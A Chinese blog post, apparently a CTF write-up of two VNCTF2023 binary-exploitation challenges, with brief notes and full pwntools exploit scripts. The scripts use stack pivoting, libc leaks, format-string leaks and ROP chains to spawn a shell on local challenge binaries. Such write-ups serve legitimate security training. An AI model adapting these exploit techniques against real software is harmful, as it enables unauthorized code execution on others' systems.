VNCTF2023 PWN (traveler & tongxunlu)

最新推荐文章于 2024-06-28 09:31:42 发布
最新推荐文章于 2024-06-28 09:31:42 发布
阅读量791 收藏
点赞数 1
文章标签: linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maple105890/article/details/129115700
版权

traveler

我也不知道为什么会在这题上卡这么久呜呜呜

一看,不就是个简单的栈迁移吗,还给了后门函数

然后试了一下发现echo flag不行

再试了一下/bin/sh也不行

开始泄露libc

突然发现泄露出来后got表发生了点奇怪的变化回不去main了

然后就调试了好久呜呜呜呜呜

最后用了0x401216来控制rsi

把寄存器布置完后

栈迁移把r12 pop 成0 强行用one_gadget拿shell

exp:

from pwn import *
from LibcSearcher import *

context.log_level='debug'
#p = remote('node4.buuoj.cn',27878)
p = process('./traveler')
elf = ELF('./traveler')
libc = ELF("/home/wh1sper/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6")

main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi = 0x00000000004012c3
lea_ret = 0x0000000000401253
ret = 0x000000000040101a
bss = elf.bss() + 0x400

payload = b'a'*0x20 + p64(bss) + p64(0x401216)
p.sendafter(b"who r u?\n",payload)

p.sendafter(b"How many travels can a person have in his life?\n",b'\n')

payload = b'a'*0x20 + p64(bss+0x20) + p64(0x401216)
p.sendline(payload)

p.sendlineafter(b"How many travels can a person have in his life?\n",b'/bin/sh\x00')

payload = p64(bss+0x30) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
p.sendline(payload)

libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.symbols['puts']
print("libc_base-->"+hex(libc_base))

sys_addr = libc_base + libc.symbols['system']
pop_r12 = libc_base + 0x000000000002f709
one_gadget = libc_base + 0xe3afe

payload = p64(pop_r12) + p64(0) + p64(one_gadget) + p64(0) + p64(0x404460-8) + p64(lea_ret)
p.send(payload)

p.sendline(b'/bin/sh\x00')
p.interactive()

呜呜呜tcl

tongxunlu

比赛的时候没出

大致看了下是strtol控制rax然后跳转到sys_write附近把elf_base和libc_base打出来

然后比赛结束师兄给我看了下他的非预期

我只能说好顶

前面是一样的

第一次p8(0x79)返回

第二次p8(0x12),跳到printf这边

这样就可以输入%p这种人为搞格式化字符串泄露内容

payload = b'%7$p|%11$p'
payload = payload.ljust(0x30,b'a')
payload += p64(stack_addr + 0x240) + p8(0x12)
p.send(payload)

这个+0x240等会会说

于是就这样了

后面当我们read的时候

发现rbp其实是前面的stack+0x240,最后输入的时候是rbp-0x130,这时候的输入就要把rsp后面的ret变成rop链,然后就能lea_ret执行rop链了

exp:

from pwn import *
from LibcSearcher import *

context.log_level='debug'
#p = remote('node4.buuoj.cn',25276)
p = process('./xxx')
elf = ELF('./xxx')
libc = ELF("/home/wh1sper/Desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc.so.6")

payload = b'a'*0x38 + p8(0x79)
p.sendafter(b"if you give me your number,i will give you some hao_kang_de\n",payload)

p.recvuntil(b'is ')
stack_addr = int(p.recv(12),16)
print("stack_addr-->"+hex(stack_addr))

p.sendafter(b"anything want to say?\n",b'Korey0sh1')

payload = b'%7$p|%11$p'
payload = payload.ljust(0x30,b'a')
payload += p64(stack_addr + 0x240) + p8(0x12)
p.send(payload)

p.sendafter(b"anything want to say?\n",b'Korey0sh1')

p.recvuntil(b'0x')
libc_base = int(p.recv(12),16) - 243 - libc.symbols['__libc_start_main']
p.recvuntil(b'0x')
elf_base = int(p.recv(12),16) - 0x978
p.recvuntil(b'is ')
stack_addr = int(p.recv(12),16)
print("libc_base-->"+hex(libc_base))
print("elf_base-->"+hex(elf_base))
print("stack_addr-->"+hex(stack_addr))

sys_addr = libc_base + libc.symbols['system']
str_bin_sh = libc_base + next(libc.search(b'/bin/sh'))

pop_rdi = elf_base + 0xa13
pop_rsi = elf_base + 0xa11

payload = b'a'*0x28 + p64(pop_rdi) + p64(str_bin_sh) + p64(pop_rsi) + p64(0) + p64(0) + p64(sys_addr)
p.sendafter(b"anything want to say?\n",payload)

p.interactive()

呜呜呜

真的tcl

k orey0sh1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
pwn2exploit, 所有的文件 pwn &利用.zip
10-09
pwn2exploit, 所有的文件 pwn &利用 pwn &利用这是些前段时间研究二进制的一些心得纸张。本来是希望能够从底层原理到全局把控的层次去整理。这里只完成了部分的Paper。还有很多的Paper只写了概要点。linux进程动态so...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
vnctf2023 traveler
XDiku的博客
02-22 421
vnctf2023
VNCTF2023-misc方向wp
toto的博客
02-19 1636
VNCTF2023wp
NewStarCTF 2023 [WEEK 3] PWN
Xzzzz911的博客
10-28 741
这次题目确实上了一个档次,有些东西确实也不怎么好理解,慢慢来,积少成多,相同题型放一起总结,总会得出好的结论,就一句话:多做多总结,冲冲冲!!!
VNCTF2023 WP
qq_74710163的博客
02-25 336
其功能主要是为命令行程序(cmd.exe)提供类似于Csrss.exe进程的图形子系统等功能支持,而之前在Windows XP系统中Conhost.exe的这一功能是由Csrss.exe进程“兼职”提供的,但这被认为存在不安全因素,于是微软为了提高系统安全性在06年之后发布的Vista和Win7系统中新加入Conhost.exe进程。svchost.exe是微软Windows操作系统中的系统文件,微软官方对它的解释是:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。
vnctf2022 travel-dfs递归爆破
qq_54929422的博客
01-24 196
因为字符一环套一环,前一个数依靠后一个数,已知v4[23],可以用dfs(递归)的方法。第45-46行的异或有点难搞,因为模的话有很多取值,所以采取爆破的方法。看上去很复杂,实际上不难理解,有点像简易版的aes。动调把dword_404040数组dump下来。而且面对复杂的代码要慢慢看,逻辑可能是清晰的。垃圾代码很少,有可读性,有两次字符串输入。很容易异或,所以不要被复杂的代码吓到。然后是关键函数sub_402058。脚本先dfs爆破,得到的值进行逆。关键函数sub_401A6C。脚本得20211205。
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
[irisctf 2023] pwn部分
weixin_52640415的博客
01-09 733
irisctf 2023 pwn 两题
roarctf_2019_easy_pwn
maple105890的博客
01-07 183
用off by one构造的烦人的堆重叠,真的调试的我想死
CTF-PWN-栈溢出-中级ROP-【栈迁移】
llovewuzhengzi的博客
01-09 1291
所以此时的gadget应该是能够进行栈迁移的,即为待会要改到的rsp值+修改参数的gadget+read函数+leave_ret,此时由于想直接用程序内的gadget来构造参数,此时可以以原函数开始准备read函数调用的地址作为调用read函数地址,此时可以参数构造就不要担心需要找gadget或者直接利用read函数后rdi rsi rdx没有被修改的特点从而只修改rsi即可,正好存在这样的gadget(main函数ret结束前调用的最后一个函数是向bss段输入数据)。
VNCTF 2023 部分wp
sln_1550的博客
02-20 2208
今年逆向题目比较多,还挺顺手的,其他题目还算不难,除了babyAnti这题就AK逆向了。这题用的flutter库,研究了好久也完全找不到思路,只好放弃。后来才知道根据题目的名字,预期解就是去掉反作弊的检查,用作弊方法完成的。
2023年2月国内外CTF比赛时间汇总来了!
网络安全
02-08 4881
2月国内外CTF比赛时间汇总
Linux杂货铺】Linux学习之路:期末总结篇1
最新发布
聆风吟的博客
06-28 1159
本文主要讲了作者本人期末复习时的总结,欢迎大家借鉴浏览。
编写Linux下第一个Go程序(2024版)
06-27 624
首先是安装GO语言包,预备要安装的是go version go1.22.4 linux/amd64,移步至,选择go1.22.4.linux-amd64.tar.gz 下载Do not。
云计算【第一阶段(21)】Linux引导过程与服务控制
YCyjs的博客
06-26 994
开机自检:检测出第一个能够引导系统的设备MBR 引导:运行放在MBR扇区里的启动GRUB引导程序GRUB 菜单:GRUB引导程序通过读取GRUB配置文件/boot/grub2/grub.cfg,来获取内核和镜像文件系统的设置和路径位置加载 Linux 内核:把内核和镜像文件系统加载到内存中init 进程初始化:加载硬件驱动程序,内核把init进程加载到内存中运行。
应急响应靶机-Linux(1)
tmyzxy1314的博客
06-27 401
先找到的三个flag,最后才找的ip地址所以麻烦各位读者先从下面开始看起!!!ip地址也是看了wp才知道接着flag第三题的过程看一眼,redis日志文件等级cat /etc/redis.conf | grep loglevel整个命令cat /etc/redis.conf | grep loglevel的作用是显示/etc/redis.conf文件中所有包含“loglevel”的行,这通常用于快速查找和查看Redis配置文件中关于日志级别的设置为loglevel verbose级别直接去找redis日志文
2023 羊城杯 pwn
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城杯pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值